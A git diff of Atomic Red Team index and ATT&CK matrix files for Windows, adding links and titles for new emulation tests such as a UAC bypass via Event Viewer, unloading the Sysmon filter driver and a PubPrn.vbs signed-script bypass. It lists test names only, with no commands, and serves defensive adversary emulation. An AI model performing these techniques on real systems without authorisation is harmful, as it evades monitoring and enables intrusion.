-- T1088 Bypass User Account Control [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
+- [T1088 Bypass User Account Control](./T1088/T1088.md)
+ - Atomic Test #1: Bypass UAC using Event Viewer [windows]
- [T1191 CMSTP](./T1191/T1191.md)
- Atomic Test #1: CMSTP Executing Remote Scriptlet [windows]
- Atomic Test #2: CMSTP Executing UAC Bypass [windows]
@@ -23,6 +24,7 @@
- Atomic Test #1: Deobfuscate/Decode Files Or Information [windows]
- Atomic Test #2: Certutil Rename and Decode [windows]
- [T1089 Disabling Security Tools](./T1089/T1089.md)
+ - Atomic Test #8: Unload Sysmon Filter Driver [windows]
- T1211 Exploitation for Defense Evasion [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- T1181 Extra Window Memory Injection [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- [T1107 File Deletion](./T1107/T1107.md)
@@ -88,7 +90,8 @@
- T1198 SIP and Trust Provider Hijacking [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- [T1064 Scripting](./T1064/T1064.md)
- T1218 Signed Binary Proxy Execution [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
-- T1216 Signed Script Proxy Execution [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
+- [T1216 Signed Script Proxy Execution](./T1216/T1216.md)
+ - Atomic Test #1: PubPrn.vbs Signed Script Bypass [windows]
- T1045 Software Packing [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- [T1099 Timestomp](./T1099/T1099.md)
- [T1127 Trusted Developer Utilities](./T1127/T1127.md)
@@ -114,7 +117,8 @@
- Atomic Test #1: Install AppInit Shim [windows]
- [T1138 Application Shimming](./T1138/T1138.md)
- Atomic Test #1: Application Shim Installation [windows]
-- T1088 Bypass User Account Control [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
+- [T1088 Bypass User Account Control](./T1088/T1088.md)
+ - Atomic Test #1: Bypass UAC using Event Viewer [windows]
- T1038 DLL Search Order Hijacking [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- T1068 Exploitation for Privilege Escalation [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- T1181 Extra Window Memory Injection [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
@@ -210,7 +214,8 @@
- Atomic Test #1: At.exe Scheduled task [windows]
- Atomic Test #2: Scheduled task Local [windows]
- Atomic Test #3: Scheduled task Remote [windows]
-- T1180 Screensaver [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
+- [T1180 Screensaver](./T1180/T1180.md)
+ - Atomic Test #1: Set Arbitrary Binary as Screensaver [windows]
- T1101 Security Support Provider [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- T1058 Service Registry Permissions Weakness [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- T1023 Shortcut Modification [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
@@ -253,6 +258,7 @@
- [T1063 Security Software Discovery](./T1063/T1063.md)
- Atomic Test #1: Security Software Discovery [windows]
- Atomic Test #2: Security Software Discovery - powershell [windows]
+ - Atomic Test #4: Security Software Discovery - Sysmon Service [windows]
- [T1082 System Information Discovery](./T1082/T1082.md)
- Atomic Test #1: System Information Discovery [windows]
- [T1016 System Network Configuration Discovery](./T1016/T1016.md)
@@ -406,9 +412,11 @@
- Atomic Test #2: Scheduled task Local [windows]
- Atomic Test #3: Scheduled task Remote [windows]
- [T1064 Scripting](./T1064/T1064.md)
-- T1035 Service Execution [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
+- [T1035 Service Execution](./T1035/T1035.md)
+ - Atomic Test #1: Execute a Command as a Service [windows]
- T1218 Signed Binary Proxy Execution [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
-- T1216 Signed Script Proxy Execution [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
+- [T1216 Signed Script Proxy Execution](./T1216/T1216.md)
+ - Atomic Test #1: PubPrn.vbs Signed Script Bypass [windows]
- T1072 Third-party Software [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- [T1127 Trusted Developer Utilities](./T1127/T1127.md)
- Atomic Test #1: MSBuild Bypass Using Inline Tasks [windows]
diff --git a/atomics/windows-matrix.md b/atomics/windows-matrix.md
index 58a8a442..097ca128 100644
--- a/atomics/windows-matrix.md
+++ b/atomics/windows-matrix.md
@@ -4,9 +4,9 @@
| Drive-by Compromise [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [CMSTP](./T1191/T1191.md) | [Accessibility Features](./T1015/T1015.md) | [Access Token Manipulation](./T1134/T1134.md) | [Access Token Manipulation](./T1134/T1134.md) | [Account Manipulation](./T1098/T1098.md) | [Account Discovery](./T1087/T1087.md) | Application Deployment Software [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Audio Capture](./T1123/T1123.md) | Automated Exfiltration [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Commonly Used Port [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) |
| Exploit Public-Facing Application [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Command-Line Interface](./T1059/T1059.md) | AppCert DLLs [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Accessibility Features](./T1015/T1015.md) | [BITS Jobs](./T1197/T1197.md) | [Brute Force](./T1110/T1110.md) | Application Window Discovery [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Distributed Component Object Model [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Automated Collection](./T1119/T1119.md) | [Data Compressed](./T1002/T1002.md) | Communication Through Removable Media [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) |
| Hardware Additions [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Control Panel Items [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [AppInit DLLs](./T1103/T1103.md) | AppCert DLLs [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Binary Padding](./T1009/T1009.md) | [Credential Dumping](./T1003/T1003.md) | [Browser Bookmark Discovery](./T1217/T1217.md) | Exploitation of Remote Services [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Clipboard Data](./T1115/T1115.md) | [Data Encrypted](./T1022/T1022.md) | Connection Proxy [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) |
-| Replication Through Removable Media [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Dynamic Data Exchange](./T1173/T1173.md) | [Application Shimming](./T1138/T1138.md) | [AppInit DLLs](./T1103/T1103.md) | Bypass User Account Control [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Credentials in Files](./T1081/T1081.md) | [File and Directory Discovery](./T1083/T1083.md) | [Logon Scripts](./T1037/T1037.md) | [Data Staged](./T1074/T1074.md) | [Data Transfer Size Limits](./T1030/T1030.md) | Custom Command and Control Protocol [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) |
+| Replication Through Removable Media [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Dynamic Data Exchange](./T1173/T1173.md) | [Application Shimming](./T1138/T1138.md) | [AppInit DLLs](./T1103/T1103.md) | [Bypass User Account Control](./T1088/T1088.md) | [Credentials in Files](./T1081/T1081.md) | [File and Directory Discovery](./T1083/T1083.md) | [Logon Scripts](./T1037/T1037.md) | [Data Staged](./T1074/T1074.md) | [Data Transfer Size Limits](./T1030/T1030.md) | Custom Command and Control Protocol [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) |
| [Spearphishing Attachment](./T1193/T1193.md) | Execution through API [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Authentication Package [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Application Shimming](./T1138/T1138.md) | [CMSTP](./T1191/T1191.md) | [Credentials in Registry](./T1214/T1214.md) | [Network Service Scanning](./T1046/T1046.md) | [Pass the Hash](./T1075/T1075.md) | Data from Information Repositories [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Exfiltration Over Alternative Protocol](./T1048/T1048.md) | Custom Cryptographic Protocol [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) |
-| Spearphishing Link [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Execution through Module Load [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [BITS Jobs](./T1197/T1197.md) | Bypass User Account Control [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Code Signing [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Exploitation for Credential Access [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Network Share Discovery](./T1135/T1135.md) | Pass the Ticket [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Data from Local System [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Exfiltration Over Command and Control Channel [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Data Encoding](./T1132/T1132.md) |
+| Spearphishing Link [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Execution through Module Load [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [BITS Jobs](./T1197/T1197.md) | [Bypass User Account Control](./T1088/T1088.md) | Code Signing [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Exploitation for Credential Access [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Network Share Discovery](./T1135/T1135.md) | Pass the Ticket [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Data from Local System [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Exfiltration Over Command and Control Channel [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Data Encoding](./T1132/T1132.md) |
| Spearphishing via Service [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Exploitation for Client Execution [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Bootkit [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | DLL Search Order Hijacking [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Component Firmware [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Forced Authentication [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Password Policy Discovery](./T1201/T1201.md) | [Remote Desktop Protocol](./T1076/T1076.md) | Data from Network Shared Drive [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Exfiltration Over Other Network Medium [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Data Obfuscation [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) |
| Supply Chain Compromise [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Graphical User Interface [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Browser Extensions](./T1176/T1176.md) | Exploitation for Privilege Escalation [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Component Object Model Hijacking](./T1122/T1122.md) | [Hooking](./T1179/T1179.md) | Peripheral Device Discovery [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Remote File Copy](./T1105/T1105.md) | Data from Removable Media [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Exfiltration Over Physical Medium [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Domain Fronting [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) |
| Trusted Relationship [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [InstallUtil](./T1118/T1118.md) | [Change Default File Association](./T1042/T1042.md) | Extra Window Memory Injection [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Control Panel Items [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Input Capture](./T1056/T1056.md) | [Permission Groups Discovery](./T1069/T1069.md) | Remote Services [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Email Collection [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Scheduled Transfer [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Fallback Channels [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) |
@@ -18,9 +18,9 @@
| | [Rundll32](./T1085/T1085.md) | File System Permissions Weakness [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Port Monitors [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Exploitation for Defense Evasion [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Replication Through Removable Media [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [System Network Configuration Discovery](./T1016/T1016.md) | [Windows Remote Management](./T1028/T1028.md) | | | [Remote File Copy](./T1105/T1105.md) |
| | [Scheduled Task](./T1053/T1053.md) | [Hidden Files and Directories](./T1158/T1158.md) | [Process Injection](./T1055/T1055.md) | Extra Window Memory Injection [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Two-Factor Authentication Interception [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [System Network Connections Discovery](./T1049/T1049.md) | | | | Standard Application Layer Protocol [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) |
| | [Scripting](./T1064/T1064.md) | [Hooking](./T1179/T1179.md) | SID-History Injection [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [File Deletion](./T1107/T1107.md) | | [System Owner/User Discovery](./T1033/T1033.md) | | | | Standard Cryptographic Protocol [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) |
-| | Service Execution [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Hypervisor](./T1062/T1062.md) | [Scheduled Task](./T1053/T1053.md) | File System Logical Offsets [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | [System Service Discovery](./T1007/T1007.md) | | | | Standard Non-Application Layer Protocol [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) |
+| | [Service Execution](./T1035/T1035.md) | [Hypervisor](./T1062/T1062.md) | [Scheduled Task](./T1053/T1053.md) | File System Logical Offsets [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | [System Service Discovery](./T1007/T1007.md) | | | | Standard Non-Application Layer Protocol [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) |
| | Signed Binary Proxy Execution [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Image File Execution Options Injection](./T1183/T1183.md) | Service Registry Permissions Weakness [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Hidden Files and Directories](./T1158/T1158.md) | | [System Time Discovery](./T1124/T1124.md) | | | | [Uncommonly Used Port](./T1065/T1065.md) |
-| | Signed Script Proxy Execution [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | LSASS Driver [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Valid Accounts [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Image File Execution Options Injection](./T1183/T1183.md) | | | | | | Web Service [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) |
+| | [Signed Script Proxy Execution](./T1216/T1216.md) | LSASS Driver [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Valid Accounts [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Image File Execution Options Injection](./T1183/T1183.md) | | | | | | Web Service [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) |
| | Third-party Software [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Logon Scripts](./T1037/T1037.md) | Web Shell [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Indicator Blocking [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | | | | | |
| | [Trusted Developer Utilities](./T1127/T1127.md) | [Modify Existing Service](./T1031/T1031.md) | | Indicator Removal from Tools [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | | | | | |
| | User Execution [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Netsh Helper DLL](./T1128/T1128.md) | | [Indicator Removal on Host](./T1070/T1070.md) | | | | | | |
@@ -32,7 +32,7 @@
| | | [Registry Run Keys / Start Folder](./T1060/T1060.md) | | [Mshta](./T1170/T1170.md) | | | | | | |
| | | SIP and Trust Provider Hijacking [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | [NTFS File Attributes](./T1096/T1096.md) | | | | | | |
| | | [Scheduled Task](./T1053/T1053.md) | | [Network Share Connection Removal](./T1126/T1126.md) | | | | | | |
-| | | Screensaver [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | [Obfuscated Files or Information](./T1027/T1027.md) | | | | | | |
+| | | [Screensaver](./T1180/T1180.md) | | [Obfuscated Files or Information](./T1027/T1027.md) | | | | | | |
| | | Security Support Provider [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | Process Doppelgänging [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | | | | | |
| | | Service Registry Permissions Weakness [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | Process Hollowing [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | | | | | |
| | | Shortcut Modification [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | [Process Injection](./T1055/T1055.md) | | | | | | |
@@ -44,7 +44,7 @@
| | | Winlogon Helper DLL [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | SIP and Trust Provider Hijacking [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | | | | | |
| | | | | [Scripting](./T1064/T1064.md) | | | | | | |
| | | | | Signed Binary Proxy Execution [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | | | | | |
-| | | | | Signed Script Proxy Execution [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | | | | | |
+| | | | | [Signed Script Proxy Execution](./T1216/T1216.md) | | | | | | |
| | | | | Software Packing [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | | | | | |
| | | | | [Timestomp](./T1099/T1099.md) | | | | | | |
| | | | | [Trusted Developer Utilities](./T1127/T1127.md) | | | | | | |